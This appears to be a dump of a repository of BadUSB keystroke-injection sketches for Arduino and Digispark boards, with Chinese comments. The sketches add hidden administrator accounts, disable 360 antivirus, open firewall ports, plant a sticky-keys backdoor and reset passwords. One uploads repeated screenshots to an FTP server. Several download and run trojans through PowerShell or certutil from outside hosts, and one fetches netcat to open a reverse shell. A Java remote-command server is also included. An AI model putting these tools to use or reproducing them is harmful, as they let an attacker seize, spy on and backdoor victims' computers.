# define PAYLOAD_USER_ADD "net user INPUT0 INPUT1 /add"
# define PAYLOAD_GROUP_ADD "net localgroup Administrators INPUT0 /add"

void setup(){
 delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd_admin(3,500))
  {
  reset_windows_desktop(2000);
  }
add_user();
Keyboard.println("powershell.exe Enable-PSRemoting -SkipNetworkProfileCheck -Force;Set-NetFirewallRule –Name \"WINRM-HTTP-In-TCP-PUBLIC\" –RemoteAddress Any");
delay(2000);
Keyboard.println("exit");
}

void loop(){
}

void add_user(){
delay(2000);
Keyboard.println(PAYLOAD_USER_ADD);
delay(2000);
Keyboard.println(PAYLOAD_GROUP_ADD);
delay(1000);

}

DEFS

================================================
FILE: SpecificFunctionCode/ForceShutDownCommand(Tool).ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("SHUTDOWN -S -F -T 0"); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: SpecificFunctionCode/ForcedDeletionOf360Processes(Tools).ino
================================================
void setup() {
Mouse.begin();//鼠标事件开始
Keyboard.begin();
delay(7000);
 for(int i=0;i<20;i++){
   Mouse.move(-127,-127);//鼠标移动(x,y)
 }
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("\"C:\\Program Files (x86)\\360\\360Safe\\safemon\\360Tray.exe\" /disablesp 1");
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(1000); 
  Keyboard.println("taskkill /F /IM explorer.exe");
  delay(3000);
  for(int b=0;b<30;b++){
    Mouse.move(20,0);
    for(int a=0;a<100;a++){
      Mouse.move(0,8);
      Mouse.click();
    }
    for(int c=0;c<20;c++){
    Mouse.move(0,-127);//鼠标移动(x,y)
    }
  }
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(KEY_DELETE);
Keyboard.release(KEY_LEFT_CTRL);
Keyboard.release(KEY_DELETE);
delay(2000);
Keyboard.press('t');
Keyboard.release('t');
delay(1000);
Keyboard.press('f');
Keyboard.press('n');
Keyboard.release('f');
Keyboard.release('n');
Keyboard.release(KEY_LEFT_ALT);
delay(1000);
Keyboard.print("explorer");
Keyboard.press(KEY_TAB);
Keyboard.release(KEY_TAB);
delay(500);
Keyboard.println(" ");
delay(3000);
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(1000); 
  Keyboard.println("cmd /c taskkill /F /IM taskmgr.exe&taskkill /F /IM 360Tray.exe&taskkill /F /IM ZhuDongFangYu.exe");
Mouse.end();//鼠标事件结束
Keyboard.end();
}
void loop() {
  // put your main code here, to run repeatedly:

}


================================================
FILE: SpecificFunctionCode/Hide_CMD_Window(Display).ino
================================================
//隐藏CMD窗口
void setup() {
  Keyboard.begin();
  delay(3000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(1000); 
  //=========================Run==========================
  Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6");
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.press(' ');
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  Keyboard.release(' ');
  delay(200);
  Keyboard.print("m");
  Keyboard.press(KEY_LEFT_ARROW);
  delay(3000);
  Keyboard.release(KEY_LEFT_ARROW);
  Keyboard.println();
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}

void loop() {
}


================================================
FILE: SpecificFunctionCode/MouseKeepsMoving(Tools).ino
================================================
void setup() {
Mouse.begin();
}
void loop() {
Mouse.move(10,0);
delay(800);
Mouse.move(-10,0);
delay(800);
}


================================================
FILE: SpecificFunctionCode/OpenPort445.ino
================================================
#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76

void setup() 
{
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(KEY_M,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("cmd"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(500);
DigiKeyboard.print(F("netsh advfirewall firewall add rule name=")); 
DigiKeyboard.print(char(34)); 
DigiKeyboard.print(F("open445")); 
DigiKeyboard.print(char(34)); 
DigiKeyboard.print(F(" dir=in protocol=tcp localport=445 action=allow"));
DigiKeyboard.sendKeyStroke(KEY_ENTER);

}


void loop() 
{

}

================================================
FILE: SpecificFunctionCode/OpenSpecified_webPage.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(3000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(200); 
  Keyboard.press('r');//r键 
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  Keyboard.println("HTTP://SHOP117137052.TAOBAO.COM");
  Keyboard.println();
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: SpecificFunctionCode/ShiftBackdoor.ino
================================================
//Lemon_C Device Library
//shop117137052.taobao.com
void setup() {//初始化
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6");  //尽量隐藏命令行窗口
  delay(1000);
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.print(" ");
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  delay(200);
  Keyboard.print("m");
  Keyboard.press(KEY_LEFT_ARROW);
  delay(3000);
  Keyboard.release(KEY_LEFT_ARROW);
  delay(500);
  Keyboard.println();
  delay(500);
  Keyboard.println("POWERSHELL.EXE -C START-PROCESS CMD -VERB RUNAS&&EXIT");  //psl启动dos命令
  //NEED BYPASS UAC NOW,SET DELAY=3S.
  Keyboard.press(KEY_LEFT_ALT);
  delay(3000);
  Keyboard.print('Y');
  Keyboard.releaseAll();
  delay(2000);
  //HIDE THE WINDOW
  Keyboard.println();
  Keyboard.println("CMD /t:01 /q /d /f:off /v:on /k MODE con: cols=30 lines=6&EXIT");  //尽量隐藏窗口
  delay(800);
  Keyboard.press(KEY_LEFT_ALT);
  delay(200); 
  Keyboard.print(" ");
  delay(200); 
  Keyboard.release(KEY_LEFT_ALT);
  delay(200);
  Keyboard.print("m");
  Keyboard.press(KEY_LEFT_ARROW);
  delay(3000);
  Keyboard.release(KEY_LEFT_ARROW);
  delay(500);
  Keyboard.println();
  delay(500);
  Keyboard.println("REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&TAKEOWN /F %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE&ICACLS %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE /GRANT ADMINISTARTORS:f&ECHO Y|CACLS %sYSTEMrOOT%\\SYSTEM32\\SETHC.EXE /g %username%:f&COPY C:\\WINDOWS\\SYSTEM32\\CMD.EXE C:\\WINDOWS\\SYSTEM32\\SETHC.EXE /y&EXIT");  //替换SETHC文件，设置shift后门
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: SpecificFunctionCode/SimplyChangeAllUsersPasswords(TrickItem).ino
================================================
#include<Keyboard.h>
void setup() 
{//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.println("CMD.EXE /C REG DELETE hkcu\\sOFTWARE\\mICROSOFT\\wINDOWS\\cURRENTvERSION\\eXPLORER\\rUNmru /F&NET USER %USERNAME% HACKED&EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop()//循环
{
}

================================================
FILE: SpecificFunctionCode/SimplyShutDownMachine(TrickItem).ino
================================================
#include <Keyboard.h>

void setup()
 {
  // put your setup code here, to run once:
  Keyboard.begin();//开始键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁
  Keyboard.release(KEY_CAPS_LOCK);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);//win键
  delay(500);
  Keyboard.press('r');//r键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);//按住win+R
  Keyboard.release('r');
  Keyboard.print("cmd");//输入cmd
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  delay(500);
  Keyboard.print("shutdown -s -t 0");//关机
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  Keyboard.end();
}

void loop() 
{

}

================================================
FILE: SpecificFunctionCode/TakeScreenshot_SendSpecifiedFTP_Address(Tool).ino
================================================
#define BOARDTYPE
#ifdef TEENSY2
    #include<usb_private.h>
#endif


void setup(){
delay(3000);
  wait_for_drivers(2000);

  minimise_windows();
  delay(500);
  while(!cmd(3,500,"cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\""))
  {
  reset_windows_desktop(2000);
  }

 Keyboard.println("echo Add-Type -Assembly System.Windows.Forms  > %temp%\\ss.ps1");
  Keyboard.println("echo mkdir $env:temp\\screens -Force  >> %temp%\\ss.ps1");
  Keyboard.println("echo While (1) {  >> %temp%\\ss.ps1");
  Keyboard.println("echo $fn = $((get-date).toString('dd_MM_yyyy_HH_mm_ss')) + \".png\"  >> %temp%\\ss.ps1");
  Keyboard.println("echo $sb = [Windows.Forms.SystemInformation]::VirtualScreen  >> %temp%\\ss.ps1");
  Keyboard.println("echo $sso = New-Object Drawing.Bitmap $sb.Width, $sb.Height  >> %temp%\\ss.ps1");
  Keyboard.println("echo $dg = [Drawing.Graphics]::FromImage($sso)  >> %temp%\\ss.ps1");
  Keyboard.println("echo $dg.CopyFromScreen( $sb.Location, [Drawing.Point]::Empty, $sb.Size)  >> %temp%\\ss.ps1");
  Keyboard.println("echo $dg.Dispose() >> %temp%\\ss.ps1");
  Keyboard.println("echo $sso.Save(\"$env:temp\\screens\\$fn\") >> %temp%\\ss.ps1");
  Keyboard.println("echo $sso.Dispose() >> %temp%\\ss.ps1");
  Keyboard.println("echo sleep INPUT0 >> %temp%\\ss.ps1");
  Keyboard.println("echo  } >> %temp%\\ss.ps1");



  Keyboard.println("echo while(1)  {  > %temp%\\up.ps1");
  Keyboard.println("echo  $wc = New-Object System.Net.webclient >> %temp%\\up.ps1");
  Keyboard.println("echo  foreach($it in (ls $env:temp\\screens)) { >> %temp%\\up.ps1");
  Keyboard.println("echo  $wc.UploadFile(\"ftp://INPUT2:INPUT3@INPUT4/INPUT5\" + $it.Name, $it.FullName) } >> %temp%\\up.ps1");
  Keyboard.println("echo rm (\"$env:temp\\screens\" + \"\\*\") -Force  >> %temp%\\up.ps1");
  Keyboard.println("echo sleep INPUT1 } >> %temp%\\up.ps1");

  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\ss.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\ss.ps1\"),0,true >> %temp%\\ss.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\ss.vbs");
  Keyboard.println("echo Set oShell = CreateObject(\"WScript.Shell\") > %temp%\\up.vbs");
  Keyboard.println("echo oShell.Run(\"powershell.exe -ep bypass -nologo -c %temp%\\up.ps1\"),0,true >> %temp%\\up.vbs");
  delay(1000);
  Keyboard.println("wscript %temp%\\up.vbs");
  delay(3000);
  Keyboard.println("exit");


}

void loop(){
}

DEFS

================================================
FILE: TrojanDownloader/CERTUTIL_DownLoader/CERTUTIL_DownLoader_MSF.ino
================================================
#include<Keyboard.h>
void setup()
{
  Keyboard.begin();//ʼͨ
  delay(4000);//ʱ1000룬Ҫ̫̣ΪÿԵٶȶһ
  Keyboard.press(KEY_CAPS_LOCK); //´д д Ȼ¾ͻ
  Keyboard.release(KEY_CAPS_LOCK); //ͷŴд
  delay(500);
  Keyboard.press(KEY_LEFT_GUI);//»ձ Ҳwin
  delay(500);
  Keyboard.press('r');//r
  delay(500);
  Keyboard.println("cmd.exe");
  delay(1000);
  Keyboard.println("certutil -urlcache -split -f http://192.168.43.242/wwy.exe D:\\setup_11.5.0.exe");
  delay(1000);
  delay(1000);
  Keyboard.println("D:\\SETUP_11.5.0.EXE");
  delay(500);
  Keyboard.println("exit");
  delay(500);
  Keyboard.press(KEY_CAPS_LOCK); //´д
  Keyboard.release(KEY_CAPS_LOCK); //ͷŴд ٴιرտĴд
  delay(400);
  Keyboard.end();//ͨѶ

}
void loop()
{
}

================================================
FILE: TrojanDownloader/FTP_DownLoader/FTP_DownloadNetcat_ConnectBackToShell(TrojanAttack).ino
================================================
void setup() {
  Keyboard.begin();
  delay(10000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("CMD");
  delay(1000);
  Keyboard.println("CD %userprofile%");
  delay(100);
  Keyboard.println("NETSH FIREWALL SET OPMODE DISABLE");  //关闭FIREWALL防火墙
  delay(2000);
  Keyboard.println("ECHO OPEN [ip] [PORT] > FTP.TXT");  //输入自己的IP及端口，等待对方连接
  delay(100);
  Keyboard.println("ECHO [username] >> FTP.TXT");  //输入用户名
  delay(100);
  Keyboard.println("ECHO [password] >> FTP.TXT");  //输入密码
  delay(100);
  delay(100);
  Keyboard.println("ECHO BIN >> FTP.TXT");
  delay(100);
  Keyboard.println("ECHO GET NC.EXE >> FTP.TXT");  //获取NC程序
  delay(100);
  Keyboard.println("ECHO BYE >> FTP.TXT");
  delay(100);
  Keyboard.println("FTP -S:FTP.TXT");
  delay(100);
  Keyboard.println("DEL FTP.TXT & EXIT");
  delay(2000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  delay(200);
  Keyboard.println("NC.EXE [listener ip] [listener port] -E CMD.EXE -D");  //后台直接监听，输入自己的IP及端口，一旦连接执行CMD命令
  delay(2000);
    Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  delay(200);
  Keyboard.println('CMD');
  delay(600);
  Keyboard.println('EXIT');
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}


================================================
FILE: TrojanDownloader/JAVA_DownLoader/JavaTrojanWrite(TargetEnvironmentRunJava).ino
================================================
void setup() {
  Keyboard.begin();
  delay(10000);//延时
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(200); 
  //=========================Run==========================
  Keyboard.println("CMD");
  delay(1000);
 
  Keyboard.println("ECHO import java.awt.*; >> client.java");
  delay(100);
  Keyboard.println("ECHO import java.awt.event.*;>> client.java");
  delay(100);
  Keyboard.println("ECHO import java.io.*;>> client.java");
  delay(100);
  Keyboard.println("ECHO import java.net.*;>> client.java");
  delay(100);
  Keyboard.println("ECHO public class Client extends Frame implements ActionListener { >> client.java");
  delay(100);
  Keyboard.println("ECHO     Label label = new Label(\"指令\"); >> client.java");
  delay(100);
  Keyboard.println("ECHO     Panel panel = new Panel(); >> client.java");
  delay(100);
  Keyboard.println("ECHO     TextField tf = new TextField(20); >> client.java");
  delay(100);
  Keyboard.println("ECHO     TextArea ta = new TextArea(); >> client.java");
  delay(100);
  Keyboard.println("ECHO     Socket client; >> client.java");
  delay(100);
  Keyboard.println("ECHO     InputStream in; >> client.java");
  delay(100);
  Keyboard.println("ECHO     OutputStream out; >> client.java");
  delay(100);
  Keyboard.println("ECHO     public Client() { >> client.java");
  delay(100);
  Keyboard.println("ECHO         super(\"客户机\"); >> client.java");
  delay(100);
  Keyboard.println("ECHO         setSize(250, 250); >> client.java");
  delay(100);
  Keyboard.println("ECHO         panel.add(label); >> client.java");
  delay(100);
  Keyboard.println("ECHO         panel.add(tf); >> client.java");
  delay(100);
  Keyboard.println("ECHO         tf.addActionListener(this); >> client.java");
  delay(100);
  Keyboard.println("ECHO         add(\"South\", panel); >> client.java");
  delay(100);
  Keyboard.println("ECHO         add(\"Center\", ta); >> client.java");
  delay(100);
  Keyboard.println("ECHO         addWindowListener(new WindowAdapter() { //退出 >> client.java");
  delay(100);
  Keyboard.println("ECHO                 public void windowClosing(WindowEvent e) { >> client.java");
  delay(100);
  Keyboard.println("ECHO                     System.exit(0); >> client.java");
  delay(100);
  Keyboard.println("ECHO                 } >> client.java");
  delay(100);
  Keyboard.println("ECHO             }); >> client.java");
  delay(100);
  Keyboard.println("ECHO         show(); >> client.java");
  delay(100);
  Keyboard.println("ECHO         try { >> client.java");
  delay(100);
  Keyboard.println("ECHO             client = new Socket(InetAddress.getLocalHost(), 6000); //向6000端口发出客户请求 >> client.java");
  delay(100);
  Keyboard.println("ECHO             ta.append(\"服务器是:\" + client.getInetAddress().getHostAddress() + \"\n\n\"); >> client.java");  //需要手动替换监听主机IP、端口，这里只给出思路
  delay(100);
  Keyboard.println("ECHO             in = client.getInputStream(); >> client.java");
  delay(100);
  Keyboard.println("ECHO             out = client.getOutputStream(); >> client.java");
  delay(100);
  Keyboard.println("ECHO         } catch (IOException ioe) { >> client.java");
  delay(100);
  Keyboard.println("ECHO         } >> client.java");
  delay(100);
  Keyboard.println("ECHO         while (true) { >> client.java");
  delay(100);
  Keyboard.println("ECHO             try { >> client.java");
  delay(100);
  Keyboard.println("ECHO                 byte[] buf = new byte[256]; >> client.java");
  delay(100);
  Keyboard.println("ECHO                 in.read(buf); >> client.java");
  delay(100);
  Keyboard.println("ECHO                 String str = new String(buf); >> client.java");
  delay(100);
  Keyboard.println("ECHO                 ta.append(str + \"\n\"); >> client.java");
  delay(100);
  Keyboard.println("ECHO             } >> client.java");
  delay(100);
  Keyboard.println("ECHO             catch (IOException e) { >> client.java");
  delay(100);
  Keyboard.println("ECHO             } >> client.java");
  delay(100);
  Keyboard.println("ECHO         } >> client.java");
  delay(100);
  Keyboard.println("ECHO     } >> client.java");
  delay(100);
  Keyboard.println("ECHO     public void actionPerformed(ActionEvent e) { >> client.java");
  delay(100);
  Keyboard.println("ECHO         try { >> client.java");
  delay(100);
  Keyboard.println("ECHO             String str = tf.getText(); >> client.java");
  delay(100);
  Keyboard.println("ECHO             byte[] buf = str.getBytes(); >> client.java");
  delay(100);
  Keyboard.println("ECHO             tf.setText(null); >> client.java");
  delay(100);
  Keyboard.println("ECHO             out.write(buf); >> client.java");
  delay(100);
  Keyboard.println("ECHO             ta.append(\"\n指令:\" + str + \"\n\"); >> client.java");
  delay(100);
  Keyboard.println("ECHO         } catch (IOException ioe) { >> client.java");
  delay(100);
  Keyboard.println("ECHO         } >> client.java");
  delay(100);
  Keyboard.println("ECHO     } >> client.java");
  delay(100);
  Keyboard.println("ECHO     public static void main(String[] args) { >> client.java");
  delay(100);
  Keyboard.println("ECHO         new Client(); >> client.java");
  delay(100);
  Keyboard.println("ECHO     } >> client.java");
  delay(100);
  Keyboard.println("ECHO } >> client.java");
  delay(100);

  Keyboard.println("javac client.java");  //编译java文件
  delay(6000);
  Keyboard.println("java client");  //执行java文件
  delay(300);
  Keyboard.press(KEY_LEFT_GUI);
  delay(200); 
  Keyboard.print('r');
  delay(200); 
  Keyboard.release(KEY_LEFT_GUI);
  delay(200);
  Keyboard.println('CMD');
  delay(600);
  Keyboard.println('EXIT');
  //======================================================
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}

void loop() {
}


================================================
FILE: TrojanDownloader/JAVA_DownLoader/server.java
================================================
import java.io.*; 
import java.net.*; 
import java.awt.*; 
import java.awt.event.*;
 
public class Server extends Frame 
{
 
ServerSocket server; 
Socket client; 
InputStream in; 
OutputStream out; 
public Server() 
{ 
super("服务器"); 
setSize(250,250);   
addWindowListener(new WindowAdapter(){ 
   public void windowClosing(WindowEvent e) 
   { 
    System.exit(0); 
   } 
}); 
show(); 
try{ 
   server=new ServerSocket(6000); 
   client=server.accept(); 
   in=client.getInputStream(); 
   out=client.getOutputStream(); 
}catch(IOException ioe){} 
while(true){ 
   try{ 
String Result=null;
    byte[]buf=new byte[256]; 
    in.read(buf); 
    String str=new String(buf);
 
    Process p = Runtime.getRuntime().exec("cmd /c "+str);
    BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
    while((Result=br.readLine())!=null)
    {
    out.write(Result.getBytes());
        
    }
   }catch (IOException e){} 
} 
}
 
public static void main(String[]args) 
{ 
new Server(); 
} 
}

================================================
FILE: TrojanDownloader/PSL_DownLoader/Downloa_PSL_Trojan-Execute_aSecondTime.ino
================================================
void setup() {
  Keyboard.begin();
  delay(5000);
  Keyboard.press(KEY_LEFT_GUI);
  delay(500); 
  Keyboard.press('r');
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.println("POWERSHELL -NOP -eXECUTIONpOLICY bYPASS -W HIDDEN -C \"(nEW-oBJECT nET.wEBcLIENT).dOWNLOADfILE('HTTP://PAN.PLYZ.NET/D.ASP?U=1369254435&P=sns.PS1','C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1')\";C:\\USERS\\PUBLIC\\sYSTEMnETWORKsERVICE.PS1;EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();
}
void loop()
{
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/LinkServer_MSF_PSL_Download.ino
================================================
#include<Keyboard.h>

void setup() 
{ //初始化，这里的代码只执行一次
delay(5000); //设置延时，让系统有足够的时间识别BadUsb5，防止后续代码执行错乱。
delay(1000);Keyboard.press(KEY_LEFT_GUI);
Keyboard.press('r');Keyboard.releaseAll();delay(500);//针对shift+ctrl切换输入法
Keyboard.press(KEY_LEFT_SHIFT);Keyboard.press(KEY_LEFT_CTRL);//针对win8及以上部分操作系统改换中文输入
Keyboard.press(KEY_LEFT_GUI);Keyboard.println(' ');//某些输入法的中英文切换
Keyboard.press(KEY_LEFT_SHIFT);//暴力直接切换成英文
Keyboard.press(KEY_CAPS_LOCK)//手动释放按键
Keyboard.releaseAll();
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // 按下Win键
Keyboard.set_key1(KEY_R); // 同时按下R键
Keyboard.send_now(); // 发送Win+R
delay(100);
Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1");
//开启极小的CMD窗口，设置文字和背景对比度尽可能相近，达到隐藏输入的目的
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(300);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //利用注册表清除开始--运行的记录
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.println("powershell (new- object System.Net.WebClient).DownloadFile('http://196.168.x.x/a.exe','D://b.exe')"); //下载木马并选择储存位置
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
delay(3000); //设置延迟，等待下载完成
Keyboard.println("D://1.exe"); //执行打开命令
Keyboard.set_key1(KEY_ENTER);
delay(300);
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_modifier(MODIFIERKEY_ALT);
Keyboard.set_key1(KEY_SPACE);
Keyboard.set_key2(KEY_C);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.set_key2(0);
Keyboard.send_now(); //关闭cmd窗口
}

void loop() //循环，这里的代码无限循环
{
}

================================================
FILE: TrojanDownloader/PSL_DownLoader/LinkServer_PSL_Download.ino
================================================
#include<Keyboard.h>
//Arduino Leonardo

void setup()
{ //初始化
Keyboard.begin();//开始键盘通信
delay(1000);//延时1000毫秒，
Keyboard.press(KEY_LEFT_GUI);//按下徽标键 也就是win键
Keyboard.press('r');//按下r键 CMD
delay(500);
Keyboard.release(KEY_LEFT_GUI);//松掉win键
Keyboard.release('r');//松掉r键
delay(500);
Keyboard.println("cmd");
Keyboard.press(KEY_RETURN);  //按下回车键
Keyboard.release(KEY_RETURN); //释放回车键
delay(500);
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //缩小窗口
Keyboard.println("powershell.exe -command start-process powershell -verb runAs");  /*开启管理员级别的powershell*/
delay(2000);
Keyboard.press(KEY_LEFT_ARROW); //按住左方向键
Keyboard.release(KEY_LEFT_ARROW); //释放左方向键
delay(500);
Keyboard.press(KEY_RETURN); //按下回车键
Keyboard.release(KEY_RETURN);//释放enter键
delay(3000);
Keyboard.println("$P = nEW-oBJECT sYSTEM.nET.wEBcLIENT"); //利用powershell 定义一个对象
Keyboard.println("$P.dOWNLOADfILE('HTTP://192.168.x.x/a.PS1','C:\\TEMP\\b.PS1')");  /*从服务端下载Powershell脚本*/
Keyboard.println("C:\\TEMP\\STEP1.PS1");
Keyboard.println("cmd.exe /T:01 /K mode CON: COLS=16 LINES=1"); //缩小窗口
delay(500);
Keyboard.end();//结束键盘通讯
}

void loop()//循环，这里的代码
{
//循环体
}

================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader0.ino
================================================
#include "DigiKeyboard.h"

void setup() 
{
DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(3000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("powershell -WindowStyle Hidden -NoLogo -executionpolicy bypass IEX(New-Object Net.WebClient).DownloadString('http://qianxiao996.cn/badusb.ps1');"));
DigiKeyboard.delay(500);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(750);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() 
{

}

================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader1.ino
================================================
void setup() {//初始化
  Keyboard.begin();//开始键盘通讯 
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键 
  delay(500); 
  Keyboard.press('r');//r键 
  delay(500); 
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  delay(500); 
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.println("CMD.EXE /t:01 /k MODE con: cols=16 lines=2");
  delay(1000);
  Keyboard.println("POWERSHELL -cOMMAND $CLNT = NEW-OBJECT sYSTEM.nET.wEBcLIENT;$URL= 'http://pan.plyz.net/d.asp?u=1948862583&p=x.exe';$FILE = ' c:\\X.EXE ';$CLNT.dOWNLOADfILE($URL,$FILE);");
  delay(3000);
  Keyboard.println("C:\\X.EXE&EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯 
}
void loop()//循环
{
}


================================================
FILE: TrojanDownloader/PSL_DownLoader/PSL_DownLoader2.ino
================================================
